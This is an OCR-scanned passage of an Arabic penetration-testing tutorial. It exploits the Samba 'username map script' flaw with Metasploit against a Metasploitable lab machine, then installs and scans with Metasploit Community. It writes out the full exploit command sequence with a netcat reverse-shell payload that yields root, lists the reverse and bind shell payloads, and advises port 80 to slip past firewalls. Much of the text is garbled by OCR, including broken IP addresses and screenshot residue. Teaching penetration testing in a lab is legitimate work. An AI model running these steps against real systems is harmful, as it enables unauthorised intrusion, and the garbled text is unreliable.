الحاسوب الهدف. الأن نعود إلى نتائجنا في ۸3ء سنفعل نفس الشيء الذي فعلناه من قبل. نحن 
ننسخ اسم الخادم ونرى ما إذا كان لديه أي نقاط ضعف. في الوقت الحالي» سننظر لمنفذ 139 الذي 
يحتوي على إصدار× . 3 لخادم ۳٥3‏ ه54. تمامًا مثل القسم السابق» سنذهب إلى ءاومه6» ونستغل 
×.3 aطmهS‏ لاستغلاله. سنرى أن هناك عددًا من النتائج» لكننا مهتمون ب 07أمR2.‏ 


7 امه هي: شركة تصنع إطارات عمل ل اأمامكه6/. ولهذا السبب نختار هذه الأعمال المعينة. 
الاستغلال الذي سنستخدمه هر أمأا٤s‏ مح" مmهrnمءu.‏ وهو ضعف تتفيذ الأوامر. اسم مشكلة 
عدم الحصانة هو استغلال امأ scئ_usermap/‏ ti/sambaاoit/muاex>p.‏ لذلك هو نفس الشيء 
الذي استخدمناه من قبل مح الباب الخلفي الشرير في خادم la .۴FP‏ مجرد اسم مختأف سنستخدمه» 


© © @ 
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Samba "username map script" Command Execution 


This module exploits a command execution vulnerability in Samba versions 30.20 through 3.0.25 rc3 when using the non-default "username map 
script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No 


authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! 


Module Name 
Free Metasploit Download 
Get your copy of the world's leading penetration testing tool 


Authors j DOWNLOAD NOW 


jduck <jduck [at] metasploit.coms= 


ا 


نحن سنذهب إلى أأهامعهاه“ وتشغيل ها0ئ١٥ءآء"..‏ سنقوم بكتابة الأمر كما فعلنا في القسم السابق. 


سنقوم بكتابة 158 ثم سنكتب اسم الاستغلال الذي نريد استخدامه. الشيء التالي الذي سنقوم به هو 
options‏ س hء.‏ سیکون الأمر کما یلي: 


use exploit/multi/samba/usermap_script 


استخدام هذه الأستغلالات دائمًا ما يكون هو نفسه. الفرق الوحيد هو الخيارات التي يمكننا ضبطها لكل 
استغلال. دائمَّا نستخدم 15€ تم نکتب اسم استغلال» تم نعرض الخیارات لنری ما يمكننا تغييره للعمل مع 
هذا الاستغلال. كلما أردنا تشغيل الاستغلال» نستخدم <اسم الاستغلال>ء ثم نعرض الخيارات لرؤية 
الخيارات التي نريد تكوينها. ولكن استخدام استغلال وتحديد الخيارات وتشغيلها هو نفسه دائما. 


java WV point CA 


نحتاج إلى إعداد 81؟۸R110.‏ وهو عنوان ۴| للحاسوب المستهدف. سنقوم بذلك بنفس الطريقة التي فعلنا 
بها في القسم السابق. تحديد الخيارات هو نفسه دائما. تمامًا كما فعلنا من قبلء نحن نستخدم الأمر أهك 


لتعيين خيار» وهو ۸۳1051 وبعد ذلك سنضع ۴| الأخاص بالحاسوب الهدف» وهو 10.0.2.4. سنقوم 

بتشغیل ۸٥|ا)امه‏ W٥۸ء»‏ وكما نرى في لقطة الشاشة التاليةء سیتم تعیین ۸۳1051 بشكل صحیيح وفقًا 
لعنوان ۴| المحدد: 

msf exploit ( J) > set RHOST 10.0.2.4 

RHOST => 10.0.2.4 

msf exploit ( J) => show options 

Module options (exploit/multi/samba/usermap script): 

ENIS Current Setting Required Description 


RHOST 10.0.2.4 : The target address 


RPORT 139 1 The target port (TCP) 


Exploit target : 
Id Name 


Automat 1C 


هنا تختلف الأشياء عن القسم السابق . في القسم السابق» نحتاج الى باب خلفي مد مثبت بالفعل على الحاسوب 
E E O SP‏ لک رین کے پیکتا کنین آی تیر 


٣1۷×‏ أا على الحاسوب المستهدف. في هذا القسم» لا يحتوي الحاسوب الهدف على باب خلفي. يحتوي 
على برنامج عادي يحتوي على ثغرات في تنفيذ التعليمات البرمجية وتجاوز سعة المخزن المؤقت. لا 
يحتوي البرنامج على أي كود يسمح لنا بتشغيل أوامر × اا. له عیب معین من شأنه أن یسمح لنا 
بتشغيل قطعة صغيرة من الكود» وتعرف هذه القطع الصغيرة من الكود ب حمولات (كلههالإةم). ما 
نحتاج إلى فعله هو إنشاء حمولة ثم نقوم بتشغيلها على الحاسوب الهدف باستخدام الثغرة الأمنية التي 
وجدناها. سيسمح لنا جزء الكود بعمل أشياء مختلفة. 


هناك أنواع مختلفة من الحمولة الصافية التي سننظر فيها في المستقبل والتي قد تتيح لنا الحمولات 
الصافية تنفيذ أوامر ×لا٣أا.‏ يمكننا تشغيل أمر عرض 445٥٠!الهم‏ لرؤية الحمولات التي نستخدمها مع 
هذه الاستغلالات الخاصة. يمكننا استخدام أنواع مختلفة من الحمولة» كما هو موضح في لقطة الشاشة 


J = show payloads 


Disclosure Date Rank Description 


(via AWK } 
(inetd } 


Lua) 

netcat } 

netcat -€] 
netcat -€} IPv 


Perl) 
perl) IPv6 
R) 

Ruby ) 
Ruby) IPv6 
socat ) 
zsh) 


(via 
(via 
(via 
(via 


(wia 
(via 
(via 
(via 
(via 
(via 
(via 


TEP 
TLP 
TEP 
TCP 
TCP 
TEP 


TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
TLP 


Bind 
Bind 
Bind 
Bind 
Bind 
Bind 


Bind 
Bind 
Bind 
Bind 
Bind 
Bind 
Bind 


shell, 
shell, 
Shell, 
Shell, 
Shell, 
SNELL, 


Shell, 
shell, 
Shell, 
Shell, 
Shell, 
Shell, 
Shell, 


Generic Command Execution 

Double Reverse TCP (telnet } 
TCP (via AWK) 

TCP [via Lua] 

TCP (via ncat]} 

TCP (via netcat) 

TEP [via netcat -€)} 
Double Reverse TCP SSL (open 


TCP (via Perl) 

TCP SSL (via perl) 
TEP SSL (via php) 
TCP (via Python) 

TCP SSL (via python) 
TCP (via E) 

TCP (via Ruby) 

TCP SSL (via Ruby) 


Reverse 
Reverse 
Reverse 
N= 
Reverse 


Reve r sê 
Reve r sê 
Reverse 
N= 
= 
RLS 
LE 
Reversê 


shell, 
Shell, 
SNELL, 
Shell, 
SNELL, 
Shell, 
Shell, 


Shell, 
Shell, 
Shell, 
shell, 
Shell, 
Shell, 
shell, 
Shell, 


ix Command 
ix Command 
ENE 


Command 
Command 


ix Command 


ix Command 


Command 


ENE 


ED 


ix Command 
ix Command 
ix Command 
ix Command 
ix Command 
ix Command 


Command 


ix Command 
ix Command 
ix Command 
ix Command 


ENE 


Command 
Command 


ix Command 
ix Command 
ix Command 
ix Command 
ix Command 


norma l 
normal 
norma l 
norma l 
norma l 
norma l 


norma l 
normal 
norma l 
norma l 
norma l 
norma l 
norma l 
norma l 
normal 
norma l 
norma l 
norma l 
norma l 
IE 
EN 


norma l 
norma l 
norma l 
norma l 
norma l 
norma l 
normal 
norma l 


cmd/unix/bind_ awk 
cmd/unix/bind inetd 
cmd/unix/bind lua 
cmd/unix/bind netcat 
cmd/unix/bind_ netcat gaping 
cmd/unix/bind_ netcat gaping _ipv6 


cmd/unix/bind_ perl 
cmd/unix/bind perl ipvê 
cmd/unix/bind r 
cmd/unix/bind_ ruby 
cmd/unix/bind_ ruby _ ipv6 
cmd/unix/bind socat udp 
cmd/unix/bind zsh 
cmdJunix/gqeneric 
cmdJunix/reverse 
cmd/unix/reverse awk 
cmd/unix/reverse lua 
cmd/unix/reverse ncat 55l 
cmd/unix/reverse netcat 
cmd/unix/reverse netcat gaping 
cmd/unix/reverse openssl 


s51} 


cmd/unix/reverse perl 
cmd/unix/reverse perl ssl 
cmd/unix/reverse php _ ssl 
cmd/unix/reverse python 
cmd/unix/reverse python ssl 
cmd/unix/reverse r 
cmd/unix/reverse ruby 
cmdJunix/reverse ruby 55l 


الحمولات عبارة عن جزء صغير من التعليمات البرمجية التي سيتم تنفيذها على حاسوب الهدف بمجرد 
استغلال الثغرة الأمنية. عندما نستغل مشكلة عدم الحصانةء سيتم تنفيذ التعليمات البرمجية التي سنختارها. 
الآن» اعتمادًا على نوع الحمولة التي نختارهاء ستقوم الحمولة بعمل شيء مفيد لنا. في لقطة الشاشة 
أعلاه» يمكننا أن نرى أن جميع الحمولات هي عبارة عن سطر أوامر؛ لذلك دعونا ننفذ مرا على حاسوب 
الهدف» تماما متل أمر ×ا"أا. وكلها تعمل فقط على نظام ×ا١لاء‏ لأن هدفنا هو ×ںہ٣اا.‏ 


java WV point ۵ 


هناك نوعان رئيسيان من الحمولات: 


1. ريط الحمولات: تفتح المتفذ على الحاسوب المستهدف» ثم يمكننا الاتصال بهذا المنفذ. 

2. الحمولات العكسية: الحمولات العكسية هي عكس حمولات الربط. تقوم بفتح المنفذ الموجود في 
الجهاز الخاص بنا ثم يتصلون من الحاسوب الهدف إلى الجهاز الخاص بنا. هذه الحمولة مفيدة؛ لأن 
هذا يسمح لنا بتجاوز جدران الحماية. تقوم جدران الحماية بتصفية أي اتصال يذهب إلى الجهاز الهدف» 
ولكن إذا كان الجهاز المستهدف يتصل بنا ولم يكن لدينا جدار حماية» فسنكون قادرين على تجاوز جدار 
الحماية. 

سنستخدم حمولة ٣5_٣٠٤ ٥2‏ ٠م۷ه٣/×cnQ/uunİ.‏ الجزء الأخير من هذه الحمولات هو لغة البرمجة أو 
الأداة التي سيتم استخدامها لتسهيل الاتصال. على سبيل المثالء في لقطة الشاشة السابقةء يمكننا أن نرى 
أن هناك حمولات مكتوبة ب |۴6» Ruby Python .P ۳H۲‏ أو أن هناك أداة تسمىی ٥2‏ 6» والتي 
تسمح بالاتصال بين أجهزة الحاسوب. حمولة en /unix/revers_"٥ ٤٤۵٤‏ هي التي نستخدمھا بنفس 
الطريقة التي نستخدم بها استغلالا. سنستخدمه فقط باستخدام الأمر 56. سيكون الأمر كما يلي: 


۲ set PAYLOAD cmd/unix/reverse_netcat 0 


سنقوم بضبط الحمولة النافعة بنفس الطريقة التي نضع بها خيارًا. نعرض خيارات لمعرفة ما إذا كان هناك 
أي خيارات أخرى نحتاج إلى ضبطهاء ولأننا اخترنا حمولةء هناك المزيد من الخيارات. في لقطة الشاشة 
التاليةء يمكننا أن نرى أن هناك خيارًا يسمى 1105ء وهو عنوان الاستماع» وهو عنواننا: 


msî exploit ( J > set PAYLOAD cmd/unix/reverse netcat 
PAYLOAD => cmd/unix/reverse netcat 
msfT exploit ( J) = show options 


Module options (exploit/multi/samba/usermap script): 


RPORT 139 ISE The target port (TCP) 


Payload options (cmd/unix/reverse netcat): 


ENIS Current Setting Required Description 


LHOST VE The listen address 
LPORT 4444 € The listen port 


Exploit target: 
Id Name 
0 Automatic 
الآن سنستخدم و|ا؟١ ٥ء للحصول على عنوان ۴| الخاص بناء وعنوان ۴| الخاص بنا لهذا المثال هو‎ 
كما هو موضح على النحو التالي:‎ ›,.5 


:~# ifconfig 
ethO: Tflaqs=4163=UP , BROADCAST , RUNNING ,MULTICAST= mtu 1500 
inet 10.0.2.115 | netmask 255.255.255.060 broadcast 10.0.2.255 
inet6 fe8O0::a00:27fT:Te0b:9166 prefixlen 64 scopeid Ox20slink= 
ether 08:00:27:0b:91:66 txqueuelen 1000 (Ethernet ) 
RX packets 422269 bytes 626680862 (597.6 MIB) 
RX errors O dropped O0 overruns O frame O 
TX packets 73395 bytes 5487095 (5.2 MiB) 
TX errors O dropped O overruns O carrier O collisions O0 


lo: flags=73<=UP , LOOPBACK, RUNNING>=> mtu 65536 
inet 127.090.0.1 netmask 255.0.0.0 
inet ::1 prefixlen 128 scopeid O0x10=host= 
loop txqueuelen 1000 (Local Loopback) 
RX packets 32 bytes 1836 (1.7 KiB) 
RX errors O0 dropped O0 overruns O0 frame O 
TX packets 32 bytes 1836 (1.7 KiB) 
TX errors O dropped O overruns O carrier O0 collisions O 


java WV point 


سنقوم بضبط 1۳08۲ بنفس الطريقة التي حددنا بها ۸۳1081 من قبل. سنضع في ۳1087[ 
10..05. للقيام بذدلك› سنستخدم الأمر set‏ ثم سنضع <اسم الخيار>» نم <القيمة> اتی ا 
ضبطها: 


| seLHOST10.0.2.15 | 


ثم سنکتب »5۸0۷W هما|٥ ٣5‏ وکل شيء يبدو جيداء» كما هو موضح في لقطة الشاشة التالية: 


15 


msf exploit ( J) > set LHOST 10.0.2 
LHOST => 10.0.2. 15 
msf exploit ( J > show options 


Module options (exploit/multi/samba/usermap script): 
ENI Current E E RN 


RHOST 10.0.2.4 es The target address 
RPORT 139 yes The target port (TCP)} 


Payload options (cmd/unix/reverse netcat): 


Name Current ا و‎ PLD 


LHOST 10.0.2. es The listen address 
LPORT 4444 res The listen port 


Exploit target: 
Id Name 


9 Automat 1C 


نحن الان نستخدم هذا الاستغلال. تم تعیین ۸۳1051 على 10.0.2.4 وھو موافق»› ثم تم تعیین 
1۳۲ على 10.0.2.15ء وهو مثالي. يمكننا أيضًا تعيين المنفذ الذي سنستمع إليه على جهاز 
الحاسوب الحالي الخاص بنا. إذا أردناء يمكننا ضبطه على 80. يتم استخدام هذا المنفذ بواسطة متصفحات 
الويب. إذا قمنا بتعيين 1۴0۴۸١‏ على 80 فسيحاول الحاسوب الهدف الاتصال بنا باستخدام المنفذ 80» 
والذي لا تتم تصفيته على جدران الحماية؛ لأنه المنفذ الذي يستخدمه خادم الويب أو متصفح الويب. إذا 
فتحنا 80 ۴0۸١‏ على الجهاز الخاص بنا وكان الهدف يتصل بنا على المنفذ 80ء فان جدار الحماية 
يعتقد أن الهدف هو تصفح الإنترنت فقط. لن نقوم بذلك الآن لأن لدينا خادم ويب يعمل على المنفذ 80 
وسوف يتعارض ذلك. سنقوم فقط بتعيين 1۴0۸1 على 5555 بنفس طريقة 11051. مرة أخرى» 
سنفعل 5١٥آأمه‏ W٥۸ء.‏ في لقطة الشاشة التاليةء يمكننا أن نرى أنه تم تغيير المنفذ إلى 5555: 


msfî exploit ( J => set LPORT 5555 
LPORT => 5555 
msf exploit ( J) > Show options 


Module options (exploit/multi/samba/usermap script): 


ل د کا ا ENIS Lurrent‏ 


RHOST 10.0.2.4 yes The target address 
RPORT 139 res The target port (TCP) 


Payload options (cmd/unix/reverse netcat] : 


Namê Lurrent ا‎ E SL 


LHOST 10.0.2. es The listen address 
LPORT 5555 fes The listen port 


Exploit target: 
Id Name 


0 Automat 1c 


java WV point CA 


الآن نحن ذاهبون لتشغيل أمر ٤أهام×ه‏ لتشغيل الاستغلال. في لقطة الشاشة التاليةء يمكننا أن نرى أن 
الجلسة الأولى قد تم فتحها وأن الاتصال بين الجهاز 10.0.2.15:5555 والجهاز 10.0.2.4:48184» 
وهو جهازنا والجهاز المستهدف: 


msî exploit ( |) = exploit 


[*] Started reverse TCP handler on 10.0.2.15:5555 
[*] Command shell session 1 opened (10.0.2.15:5555 -=> 10.0.2.4:48184) at 2018-06-13 01:06:05 -0400 


نحن ذاهبون للقيام 0۷۵ تم نقوم به معرف. سوف نرى أننا الجذر. إذا فعلنا 2- ٣2۳8‏ ناء فسنرى أننا 
في الجهاز عءاة†اماموةا6. إذا قمنا بذلك» فسنكون قادرين على سرد الملفات وما إلى ذلك. يمكننا 


استخدام أي أمر ×لا٠‏ أا مثلما فعلنا من قبل في القسم السابق» كما هو موضح على النحو التالي: 


uid=0(root) qid=0 (root) 
HES 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 1686 GNU/Linux 


java WV point @ 


في هذا القسم» سنبحث عن مجتمع أا0م5ه16. إنها واجهة المستخدم الرسومية على الويب التي تستخدم 
أهاtpءك.‏ ولكن لديها بعض الميزات الأخرى غير استغلال الثغرات الأمنية. يمكن استخدام مجتمع 
tاoامMetas‏ لاكتشاف المنافذ المفتوحة» مثل م۸۳3١20»‏ وتثبيت الخوادم» ولكنها لا تتوقف عند هذا 


الحد. يستخدم أيضًا لتعيين هذه المنافذ والخادمات إلى عمليات الاستغلال الحالية في أأهامكهم“ 
والوحدات النمطية الموجودة. من هناك يمكننا استغلال ثغرة أمنية حرفيًا على الفور باستخدام 
tاPمMetasP.‏ دعونا نری کیف یمکننا استخدامها. 


لم يتم تضمين الأداة في كالي. سننزله بأنفسنا. لتنزيله» نحتاج إلى استخدام عنوان بريدنا الإلكتروني لأننا 
سنحتاج إلى مفتاح تنشيط المنتج» والذي سيرسلونه إلى عنوان بريدنا الإلكتروني. استخدم الرابط التالي 


https: //www.rapid7.com/products/metasploit/metasplolt-community~ 


registratlon.Jsp 


بمجرد تنزيل هذاء سننتقل إلى سطح المكتب لدينا باستخدام الأمر ٥4‏ لتغيير الدليل. إذا قمنا بإدراج قائمة 
بالملفات الحاليةء فسنكون قادرين على رؤية أن ملف التغضيٽت metasploit-latest-linuxX-X64-‏ 
.اهام الخاص بنا مثبت. أول شيء سنفعله هو تغيير الأذونات إلى ملف قابل للتنفيذ حتى 
نتمكن من تنفيذ هذا الملف. في نظام ×لا٠أاء‏ لتغيير الإذن الذي نستخدمه في الأمر ۸۳0۵ء وبعد 
ذلك سنضع الإذن الذي نريد تعيينه» وهو قابل للتنفيذ ×+» وسنضع اسم الملف» وهو -اهاmetasp‏ 
-installer.run‏ x>64-inuxا-testها.‏ الآن سنطلق الأمر وهو كالتالي: 


0 chmod +x metasploit-latest-linux—~x64 -installer.run 8 


إذا نفذنا الأمر كاء سنرى أن هناك نصًا سيتم تسليط الضوء عليه باللون الأخضرء مما يعني آنه قابل 
اذه د 


0 


rootûkal1:~# cd Desktopy/ 
rootAkal1:~/Desktop# l5 
etasploit-latest-linux-x64-installer. run 


rootûkal1:~/Desktop# chmod +x metasploit-latest-linux-x64-installer. run 
rootûkal1:~/Desktop# ls 
wetasploit-latest-linux-x64-installer. run 


لتشغيا أي ملف قابل للتنفيذ في ×لا٣‏ اء سنقوم بكتابة /. تم ادخل اسم الملف الذي هر -أأهامtasمm‏ 


installer.run-x>x64->inuا-estا.‏ الأمر کالتالي: 


root@kali :~/Desktop# ./ metasploit-lest-linux~x64- 


Installer.run 


التثبيت بسيط جدا. هناك العديد من الخطوات لأتثيت: 
الخطوة 1: نضغط على أوافق على الاتفاقيةء ثم نضغط للأمام: 
Setup © ©‏ 


۳ 


Please read the following License Agreement. You must accept the terrns 
of this agreement before continuing with the installation. 
RAPIDF END USER LILENSE AGREEMENT 4 


License Agreement 


RAPIDF LLC OR RAPID INTERNATIONAL LIMITED (AS APPLICABLE, “RAPID7™) َ 
IS WILLING TO PROVIDE LERTAIN SERVILES TO YOL Aš5 THE INDIVIDUAL, 

THE COMPANY, OR THE LEGAL ENTITY (REFERENCED BELOW AS “YOU" OR 
"YOUR" OR “CUSTOMER"} THAT ENTERS INTO A WRITTEN QUOTATION, 

WORE ORDER, STATEMENT OF WORK OR SIMILAR DOLUMENT WITH RAPID 
THAT REFERENCES THESE TERMS AND CONDITIONS [(HERINAF TER, THIS 
AGREEMENT”) ONLY ON THE CONDITION THAT YOU ACCEPT ALL OF THE ۳ 


pt the agreement 
C Ido not accept the agqreernent 


Do you accept this license? 


Install Bullder 
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الخطوة 2: سوف يسألنا ما إذا كنا نريد بدء تشغيل أأهامكه6 كخادم في كل مرة يتم فيها تشغيل 
الجهاز. يمكننا اختيار إما نعم أو لاء لكننا سنختار لا. لهذا السبب سيبداً تشغيل الا اأهامكه)6 في 


كل مرة يبدأ فيها تشغيل الحاسوب. انقر فوق إلى الأمام: 


Setup © © 


ن 


Install as a service 


You can optionally register Metasploit as a service. This way it will 
automatically be started every time the machine is started. 
Install Metasploit as a service? 


E 


Install Builder 


| Back آ‎ Forward آ‎ Lancel | 


الخطوة 3: بعد ذلك سوف يطلب منا منفذ ا55 الذي سيتم استخدامه. نظرًا لأن الخدمة تعمل كواجهة 
تخدم رسومية على الويب» يمكننا ضبط ذلك على أي شيء نريده» لكننا سنتركه على أنه 3790: 


Setup 


Metasploit Service 


Please enter the port that the Metasploit service will use. 


SSL Port | EFE 


install Bullder 


| Back | Forward | Lancel | 


الخطوة 4: إنها تطلب منا اسم الخادم» وسوف نحتفظ به كمضيف محلي لأنه مثبت على مضيفنا المحلي: 


Setup © © 


س 


Generate an SSL Lertificate 


Please provide the fully qualified domain name of this systern below (€.g. 
metasploit.example.corn). A certificate is generated for a specific server 
name and web browsers will alert users If the name does not match. 


Server Narnme 


Days of validity | اد3‎ | 


Should the qenerated certificate be added to the operating system's 
trusted store? 


î Yes, trust certificate 
installBullder 


| Back آ‎ Forward | Lancel | 
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الخطوة 5: بعد ذلك سوف يطلب منا منفذ خادم قاعدة البيانات. نحن سنبقي هذا هو نفسه. هذه كلها 
تكوينات لتشغيل البرنامج: 
Setup © ©‏ 


Database Server Pararneters ™ 


Please enter the port of your databasê. 


Database Server port LEE | 


Back |١ Forward |١ Lancel 


اأخطوة 6: الان» جاهزة للنثبيت. بمجرد أن نضغط الى الأماب فانه سيدم تثبيته بالنسبة أناء وسوف يطلب 
الان» بمجرد الانتهاء من برنامج التشيت» نريد تشغيل خدمة أأهامsهامM.‏ لأنه سیتم تثبیته کخادہ» 
کخادم ویب. عندما نرید استخدام Communi‏ اoiاMetasp.‏ سنضطر إلى تشغیله باستخدام آمر 


الخدمة بنفس الطريقة التي ندير بها أي خادم في ×ا”آا. الأمر كالتالي: 


root@kali :~/Desktop# service metasploit start 


بمجرد بدء تشغيل الخادم» كل ما علينا هو الذهاب للمتصفح والانتقال إلى كما". تأكد من وضع كم)٤ا۸‏ 
وليس /٥٣اهعه|ا//:ماا»‏ ثم ندخل المنفذ الذي يعمل عليه ااهام‌sه6‏ وهو 3790. اضغط على 
۲ع. الآن يطلب منا تسجيل الدخول» ثم يتعين علينا إدخال اسم المستخدم وكلمة المرور اللذين 
اخترناهما أثناء تثبيت البرنامج» وبعد ذلك سنكون قادرين على استخدامه. سنتحدث عن تسجيل الدخول 
واستخدام الأداة في القسم التالي. 
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MSFC scan | MNS۴° فحص‎ 


الآن» سوف نقوم بتسجيل الدخول باستخدام اسم المستخدم وكلمة المرور التي حددناها عند تيت الأداة. 
في الصورة التالية تظهر واجهة ويب لمجتمع أا0امMe†as:‏ 


Account - znid ¥  Adminisiration ۲ ? 


™ metasplort 


Project Listing 


Metasploit Community 4.11.7 - Update 2016052401 © 2010-2016 Rapid? Inc, Boston, MA 


الآن» بعد تسجيل الدخول» يمكننا الوصول إلى الحساب والانتقال إلى إعداد المستخدم لدينا أو تسجيل 
الخروج. يمكننا أيضًا التحقق من تحديثات البرامج. 

عندما نقوم بتسجيل الدخول لأول مرة» سيطلب منا إدخال مفتاح التنشيط. سيتم إرسال مفتاح التفعيل إلى 
عنوان بريدنا الإلكتروني الذي نضعه عند تنزيل الأداة. يجب أن نتأكد من أننا أدخلنا عنوان بريد إلكتروني 
صالكًا عند تنزيل الأداة. 

سنبدأً الفحص» وسوف نضغط على Ciھزە۴r‏ | .New Project‏ سوف نسمي هذا المشروع 
ماoitabاtaspهص.‏ وسنترك الوصف فارغاء ثم يطلب منا نطاق شبكة. يمكننا ضبط ذلك بنفس الطريقة 


التي قمنا بها مع 26١۳3۲‏ ويمكننا ضبطها على نطاق. إنه في الواقع نطاق موجود داخل شبكتتا 


الفرعية في الوقت الحالي» وهو 10.0.2.1 حتى 254. يمكننا مسح الشبكة بالكامل بحتًا عن نقاط 
الضعف والاستغلال» لكن في الوقت الحالي» سنستهدف 10.0.2.4 وهو نة .Metasploitable‏ 


الآن سنضغط على إنشاء مشروع. تعرض لقطة الشاشة التالية جميع المعلمات التي تمت مناقشتها: 


Project Settings 


الآنء تم إنشاء المشروع» وسنبداً عملية المسح عليه. سنذهب إلى زر المسح على الجانب الأيسر من 
الشاشة وانقر فوقه. لبدء المسح» يجب أن نذهب إلى "إظهار الخيارات المتقدمة" لتعيين بعض الخيارات 
المتقدمة. إذا كان لدينا نطاق» فيمكننا استخدام عنوان الاستبعاد لاستبعاد بعض عناوين ۳|. على سبيل 
المثال» إذا كنا نستهدف الشبكة بالكامل من 1 إلى 254 فيمكننا استبعاد جهاز الحاسوب الخاص بنا 
من البحث عن طريق كتابة عنوان ۴| الخاص بنا وهو 10.0.2.15. يمكننا أيضًا وضع وسيطة ١٣2P‏ 
مخصصة لأن أأهامكه6/ سيستخدم م2 فعليًا للحصول على الخدمة والتطبيقات المثبتة. يمكننا 
إضافة منافذ ۲٥۴‏ إضافية أو إخراج منافذ .1٥۴‏ مرة أخرى يمكننا أن نفعل الشيء نفسه. يمكننا حتى 
ضبط السرعة. لدينا أيضا اكتشاف خادم 0۴لا. يكتشف فعليًا الخدمة المثبتة على المنفذ. يمكننا أيضا 
تعيين بيانات الاعتماد. إذا كان الحاسوب الهدف يستخدم نوعًا من المصادقةء فيمكننا إعداده» لكننا بخير 
لأن هدفنا لا يستخدم أَيّا من ذلك. يمكننا أيضا تعيين علامة للحاسوب الهدف. 


الآن» نحن لن الفوضى مع هذه الإعدادات. سنبقي كل شيء كما هو لتبسيط الأمر» وسنقوم بتشغيل 
المسح. بمجرد انتهاء هذا المسح» سنرى كيف يمكننا التحليل والاكتشاف ونرى ما يمكننا القيام به 
بالمغخلرمات المكةة. 


java WV point 


انتهت عملية الفحص» وتستغرق دقيقتين تقريبًا. إذا نقرنا على جهاز ءاطه†اهاموها ۷6ء فسوف نرى أننا 
اكتشفنا أحد النقاط الساخنة الجديدة» و33 خادم جديد مثبت عليه» وتمكنت أيضًا من اكتشاف ثغرة أمنية 


وأحدة: 


Project - metas ploita ble Y 


Account - zaid Y Administration ¥ ? 
™ metasploit 
Analysis Sess ions Campaigns Web Apps Modules Credentials Re ports Ex ports Tasks 

Overview - Project metasploitable 

Discovery Penetration 
tifia 
0 Scan Import ( Nex pose Scan Sonar Import 
ı Bruteforce O Exploit 

Evidence Collection Cleanup 

aa Collect JJ7 Cleanup 


Recent Events 


TIME EVENT DETAILS 
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.Metasploitable zun ئlتi‎ :f4 


الآن نحن بصدد ءstه‏ ۸ | ءاوراهہA»‏ ونری آن لدينا ١۴‏ المضيف لدينا وهو 10.0.2.4 وأنه قد تم 
مسحها بشکل صحیح. لدیه ۰۷0۷31٩‏ لدیه خادم» وهو یعمل علی 8.04 ×ں٣!اا:‏ 


£ Project - metas ploita ble Y Account - zald Y Administration Y 3 
™ metasploit 


Overview Analysis Sess ions Campaigns Web Apps Modules Credentials Re ports Ex ports Tasks 


9 Scan mport ا‎ Nexpose Scan $û WebScan O Modules ® Bruteforce O Exploit J New Host 


Hosts Not‘ ن‎ 1# bilitit = 


ADORESS 4 NAME OPERATING SYS TEM VM PURPOSE SVCS VLNS ATT TAGS UPDATED STATUS 
20 | 1 
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9 مسح المضيف 


إذا نقرنا على 10.0.2.4 ۴١ء‏ فيمكننا رؤية الخدمة المثبتة كما هو موضح في لقطة الشاشة التالية: 


Project - metas ploita ble Y Account - zald ¥ Administration Y 7 
9 metasploit 


Overview Analysis Sessions Campaigns Web Apps Modules Credentinls Re ports Ex ports Tasks 


ne metasploitable TD 1002.4- metasploitable 
Delete ن‎ can ا‎ Nexpose Scar BS Bruteforce © Exp 1 


Services (33 Vulne 11€ 1) edentia 2 sotured Dat Notes(o) 


(e) 


New Service 


NAME PORT PROTO S TATE SERVICE INFORMA TION CREATED v 
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java WV point 


وأ؟: الخادمات المثبتة 


في لقطة الشاشة السابقة» يعرض "۸١E‏ اسم الخادہ. ۴۸010 يظهر البروتوكول. توضح مهك 
حالة المنفذ. SERVICE INFORMATION‏ تظھر معلومات الخادم. لنأخذ مثالاء 4۸65 يعمل على 
المنفذ 53 الذي يحتوي على بروتوكول م لاء والمنفذ مفتوح» والخدمة هي 9.4.2 .8|N0‏ 


يمكننا التبديل بين الصفحات باستخدام أزرار الأسهم في أسفل يمين الصفحة. وسوف تظهر نفس النتيجة 
كما 2۴"» فقط مع واجهة المستخدم الرسومية أفضل. تعرض علامة تبويب الجلسات (5١0أوومك)‏ 
الاتصالات. إذا استغلنا أي شيءء فسنراه في الجلسات. واجهة المستخدم الرسومية يشبه هذا: 


Project - metas ploita ble Y Account - zald ¥ Administration Y 7 


™ metasploit 


10.0.2.4 2۵ 


Actıve SessIons 


SESSION HIS TORY TYPE OPENED AT ™ ATIACK MODULE 


10 + 


Completed Sessions 


SESSION HIS TORY TYPE OPENED AT ™ ATTACK MODULE 
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(Exploited sessions) lawn جلت‎ :fig 


ستظهر لنا علامة تبويب 5اا ه١6٣‏ انا نقاط الضعف التي تم اكتشافها. ب ۸۳3۲ء نحصل على 
الخادمات فقط. ولكن في هاطهااهامكها۷6. فإنه يقوم بالفعل بتعيينه واظهاره لناء واذا وجد ثغرة أمنيةء 
واذا كان أأهامءه16 لديه استغلال لهذه الثغرة الأمنية. يمكننا النقر فوقه والحصول على مزيد من 
المعلومات حول مشكلة عدم الحصانة. 

ستظهر لنا علامة تبويب كاهأأ١ C۲6۵6‏ بيانات الاعتماد إذا كان هناك أي بيانات اعتماد مثيرة للاهتمام 
تمكن البرنامج من العثور عليها. في لقطة الشاشة التاليةء يمكننا أن نرى أنه تتم إدارتها للعثور على اسم 
المستخدم وكلمة المرور الخاصين ب اأ۴5۵١وأءه۴»‏ وهو ك9۲۴اءهم. إذا نقرت على أيقونة المفتاح 
تحت عمود ٤0۸|ا۷۸.‏ فسوف يتحقق ذلك لنا. يمكننا أن نرى الحالة إلى ١6ات۷‏ (التحقق من 
صحتها( في llعمود :VALIDATION‏ 


Project - metas ploitable Y 


: Account - zaid Y Administration Y 2? 
™ metasplortt 
Overv ie w Analy si Sess ions Campaigns Web Apps Modules Credentials Re ports Ex ports Tasks 
10.0.2.4 ت‎ ۵ 
Jential 
Logıns 
PUBLIC ۰ PRIVATE REALM SERVICE POAT ACCESS LEVEL TAG LAST ATTEMPTED VALIDATION VALIDATE 
20 r 
Captured Credentials 
۸ PUBL “^ 
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java WV point ۵ 


و۴(الشکل(: أوراق الإiعتnاد (Credentials)‏ 


الآن» يمكننا استخدام المعلومات السابقة. يمكننا المضي قدمًا والاتصال بقاعدة بيانات ا5۵ باستخدام 
اسم المستخدم ك ك#۴اواوهم وكلمة المرور ك ك۴٣و9اكهم.‏ لنلق نظرة سريعة على هذا. سنذهب إلى 
